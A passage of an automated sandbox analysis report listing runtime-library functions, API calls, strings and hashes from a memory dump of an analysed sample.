Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A456B10: RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A456B60
Part of subcall function 00007FFE1A456B10: RaiseException.KERNEL32 ref: 00007FFE1A456BA1

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A4566C7
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FFE1A456723

Strings

Attempted a typeid of nullptr pointer!, xrefs: 00007FFE1A456805
Bad read pointer - no RTTI data!, xrefs: 00007FFE1A456828
Bad dynamic_cast!, xrefs: 00007FFE1A456792
Access violation - no RTTI data!, xrefs: 00007FFE1A45662A, 00007FFE1A45684B

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
Instruction ID: 94ed81efe7f57d1ae8c2a69ed7d50f2aa5380855d6dfe5f07c6e85ae284c8123
Opcode Fuzzy Hash: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
Instruction Fuzzy Hash: 7B5190A2B19E8692DA20EB12F8502B9A360FF44FA4F0445B3DA5D43778DF3CE525C700

Function 00007FFE1A456FE4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A457069
GetLastError.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A457077
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A457090
LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A4570A2
FreeLibrary.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A457110
GetProcAddress.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A45711C

Strings

api-ms-, xrefs: 00007FFE1A457089

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
Instruction ID: 6664a0b00e140a49ea41bd201f55bccb93ae670519e61bde195a6ec51cb72521
Opcode Fuzzy Hash: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
Instruction Fuzzy Hash: D4316F61B1AF8295EE11EB03A8005B563E4BF44FB4F5949B6DD2E4B3A4EF3CE5648300

Function 00007FFE1A452C38 Relevance: 12.1, APIs: 8, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452CF0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452D0E
__AdjustPointer.LIBCMT ref: 00007FFE1A452D4F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452D5C
__AdjustPointer.LIBCMT ref: 00007FFE1A452D98
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452DAD
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452DF2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452DF9

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: 65b26e5f074ca0aafdff43cbb52cf6556557cf4e92b090b05be647d0b4ff5bec
Instruction ID: a4978e7ee7698631ff501eb76c3296e22e32bc2b5e6074913a1a1f1cd7a594c8
Opcode Fuzzy Hash: 65b26e5f074ca0aafdff43cbb52cf6556557cf4e92b090b05be647d0b4ff5bec
Instruction Fuzzy Hash: 6B51B4A1B09F4281FAA6AB13944467863A4AF44FB4B0944F7EE5D077B5DF3CE466C700

Function 00007FFE1A452E1C Relevance: 12.1, APIs: 8, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452ED6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452EF5
__AdjustPointer.LIBCMT ref: 00007FFE1A452F36
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452F43
__AdjustPointer.LIBCMT ref: 00007FFE1A452F7F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452F94
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452FD9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452FE0

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: d568fcbafcd5d9e8e83e95e63f5b62363508f79f2b2b670005157146ca98b55e
Instruction ID: e40670b8eb57816f2c1d056eca00c665782a1e9bb4590be741aafe81845a1856
Opcode Fuzzy Hash: d568fcbafcd5d9e8e83e95e63f5b62363508f79f2b2b670005157146ca98b55e
Instruction Fuzzy Hash: E451D8A2B09E4281EEA5EB53A44463C63A4AF54FB4F0584F7EA5D077B4DF3CE4619700

Function 00007FFE1A45EB88 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45EBFC
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45EC0B

Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CE4D
Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CE86
Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D1B1

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45ECAB
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45ECBB
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45ED67

Strings

{for , xrefs: 00007FFE1A45EC34

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID: {for
API String ID: 2943138195-864106941
Opcode ID: ad201dfe96a96ae0dc6555201844fc758e8e36effd4b63a30410ed7392a88b68
Instruction ID: a7c774f889c1db850d00febc479d16f6673b4272eb53b0ad85fbbb64df639d16
Opcode Fuzzy Hash: ad201dfe96a96ae0dc6555201844fc758e8e36effd4b63a30410ed7392a88b68
Instruction Fuzzy Hash: 4B513CB2B08E45A9F711AF26D4413F837A1EB45B58F4084B2EA4C07BA5DF7CD564C700

Function 00007FFE1A45E174 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE1A45D86D), ref: 00007FFE1A45E238
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45E257

Strings

`template-parameter, xrefs: 00007FFE1A45E265
void, xrefs: 00007FFE1A45E1BA

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: 1a349dcf90f4e371f1810c8875e562b3843b42aeee856190ba29246ab6ec8260
Instruction ID: 65f398a89f83fb43c1b66a9be4ed9a392c78d19a3d9c7cbe8bf1b71a77ebed61
Opcode Fuzzy Hash: 1a349dcf90f4e371f1810c8875e562b3843b42aeee856190ba29246ab6ec8260
Instruction Fuzzy Hash: 7A414BA2F08F5688FB11DBA2D8512FC23B1BB48BA4F5441B6DE0C17669DF7CA565C340

Function 00007FFE1A458EC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A458D3C: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A458DFD

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458F72

Strings

void, xrefs: 00007FFE1A458FE4
<ellipsis>, xrefs: 00007FFE1A458FBF
..., xrefs: 00007FFE1A458FAF
,..., xrefs: 00007FFE1A458F40
,<ellipsis>, xrefs: 00007FFE1A458F50

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 1405650943-2211150622
Opcode ID: cc95b6719b0dfac949915fa95283a824f9a94d2610a8c8b5f10b5de908d24d67
Instruction ID: a452b16370b518dbc48d18b56aeada359cb9f7a9f502f39c13c0ae49ebffb65d
Opcode Fuzzy Hash: cc95b6719b0dfac949915fa95283a824f9a94d2610a8c8b5f10b5de908d24d67
Instruction Fuzzy Hash: A64126B2B08E469CF7029BA6D8502B837B1BB08B68F9445F2CA5C13765DF7CA564D700

Function 00007FFE1A45ACC4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45ADA7

Strings

short , xrefs: 00007FFE1A45AD44
int , xrefs: 00007FFE1A45AD35
char , xrefs: 00007FFE1A45AD4D
long , xrefs: 00007FFE1A45AD26
unsigned , xrefs: 00007FFE1A45AD7B

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: 041e2dffe1b489bc893f09ff0a4f423b3d9eca273271e83df22d622629981137
Instruction ID: 1401689a4dfaf7cc22e032df7bb4adae8887ced41eef325a4d0b7d3a7c4ee6aa
Opcode Fuzzy Hash: 041e2dffe1b489bc893f09ff0a4f423b3d9eca273271e83df22d622629981137
Instruction Fuzzy Hash: FA3151B2B18F5188FB01AF6AD8541BC27B2BB09B55F4481F2DA4C07779DE3C9568CB10

Function 00007FFE1A45ADEC Relevance: 9.2, APIs: 6, Instructions: 161COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A45AE9E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45AEAE
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45AECB
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45AF3E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45AF67

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: 80a690cc5bf4571957900b2ba371d1f0df44bd22a0b18b914ff66e25afa9163e
Instruction ID: 24c0c3a8ebe99c137ac6d4cd598463d31257035ead3d87dccea6baa833f6595b
Opcode Fuzzy Hash: 80a690cc5bf4571957900b2ba371d1f0df44bd22a0b18b914ff66e25afa9163e
Instruction Fuzzy Hash: FB7169B2B08F4289F711DBA2E8902BC37A1BB44B64F5080F6DA1D176A5DF79E462C740

Function 00007FFE1A4569F0 Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FFE1A456A43
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A456A86
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE1A456AB0
InterlockedPushEntrySList.KERNEL32 ref: 00007FFE1A456ACD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A456AD9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A456AE2

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: 0fa2fcead297943da074142d2fbec92c84cd60449e30d9ad217028345c3eb4d3
Instruction ID: 2c22617a3d5710520fa0a9b58cdcc255bf9f470f33cf0513c182b61d8dba4c76
Opcode Fuzzy Hash: 0fa2fcead297943da074142d2fbec92c84cd60449e30d9ad217028345c3eb4d3
Instruction Fuzzy Hash: 2631A462B19F9151EA15EB27A80457973A0FF49FF0B5985B2DD2D033A0EE7DE865C300

Function 00007FFE1A453F60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

EncodePointer.KERNEL32 ref: 00007FFE1A453FD0
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A45401B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45424E

Strings

RCC, xrefs: 00007FFE1A453FEC
MOC, xrefs: 00007FFE1A453FE4

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 93ffbb8a8c38b724cb13d32310db34e78531563cac4ba1370c621256939a6833
Instruction ID: 817ccf16e5f614c8ae2b0fa91b85b32bd61ce66d1facdc8703b5e3ccb96781d0
Opcode Fuzzy Hash: 93ffbb8a8c38b724cb13d32310db34e78531563cac4ba1370c621256939a6833
Instruction Fuzzy Hash: 8591B3B3B08B918AE750DB66E4402BD77B1F744B98F1041AAEE8D4BB65DF38D165C700

Function 00007FFE1A45C540 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C7E0

Strings

std::nullptr_t, xrefs: 00007FFE1A45C799
volatile, xrefs: 00007FFE1A45C5B6, 00007FFE1A45C6E7
volatile , xrefs: 00007FFE1A45C5A7, 00007FFE1A45C6D8
std::nullptr_t , xrefs: 00007FFE1A45C770

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 01adbf8b940f63687fb8b05ad2c3f4aee868cfabe9c87335b9cb2bee01f92b8d
Instruction ID: 7a7b97423d2f4e3aed724f1d9a5f055a775e46facd1498bf98c907ba038ee296
Opcode Fuzzy Hash: 01adbf8b940f63687fb8b05ad2c3f4aee868cfabe9c87335b9cb2bee01f92b8d
Instruction Fuzzy Hash: C6714AB2B08E4688FB14AB2699500B867B5BB05BA4F8446F7DA4D53AA5DF2CE170C344

Function 00007FFE1A453CF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

EncodePointer.KERNEL32 ref: 00007FFE1A453D4F
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A453D9B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453F57

Strings

MOC, xrefs: 00007FFE1A453D63
RCC, xrefs: 00007FFE1A453D6B

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 8e034f92e989b9960bc08160daca0ef1833c14a7b13808a87468da7d70181806
Instruction ID: e71589378b1fe1701979186732e1bc8cec8fc63fd15ceeb90e19ffd39fffeafd
Opcode Fuzzy Hash: 8e034f92e989b9960bc08160daca0ef1833c14a7b13808a87468da7d70181806
Instruction Fuzzy Hash: 16619773A08FC581D7619B16E4403B9B7A0FB85BA4F0442A6EB9D43765DF3CE1A4CB00

Function 00007FFE1A455C50 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 135COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A455D22

Strings

csm, xrefs: 00007FFE1A455DDF
RCC, xrefs: 00007FFE1A455C9C
MOC, xrefs: 00007FFE1A455C90
csm, xrefs: 00007FFE1A455CB2

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: FileHeader
String ID: MOC$RCC$csm$csm
API String ID: 104395404-1441736206
Opcode ID: 5815091cf7d4bf77be2b6452b49c3696097c0f3c73df3e225fc204c9d15c1510
Instruction ID: 0498f6a2c30bcfe646609de0339eedfc56350870012fcedeb6dc47dcf2698f5c
Opcode Fuzzy Hash: 5815091cf7d4bf77be2b6452b49c3696097c0f3c73df3e225fc204c9d15c1510
Instruction Fuzzy Hash: 2F5190B2B09A4296EAA0AB27914417D76A0FF44F65F1440F3EE4D87761DF3CE4718B82

Function 00007FFE1A45A920 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A99B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A9BD
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A9CC
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45AA03
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45AA0E

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: f125dc20a4fc2cff283c2e4d5124f38be857c51718d1d3c9008137230ed817e4
Instruction ID: c27719cab2395f36c17cfd406b8932f99f659b90677ac9e23bdfdc20e0fe4823
Opcode Fuzzy Hash: f125dc20a4fc2cff283c2e4d5124f38be857c51718d1d3c9008137230ed817e4
Instruction Fuzzy Hash: 54414CA2B19F5298EB10EB22E8541B827B4BF15FA4F9444F3DA4D537A5DF38E865C300

Function 00007FFE1A45470C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45488B

Strings

csm, xrefs: 00007FFE1A45475B
csm, xrefs: 00007FFE1A4548C5
, xrefs: 00007FFE1A4547DC

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: bd14039b9dc44c48f3afba7226bd4a8f48c08aeb5fb2f86f7c5774b76e28317a
Instruction ID: 981da8115c9b48803b9ad4d14fb071730699ec5304509786106cb108d2509734
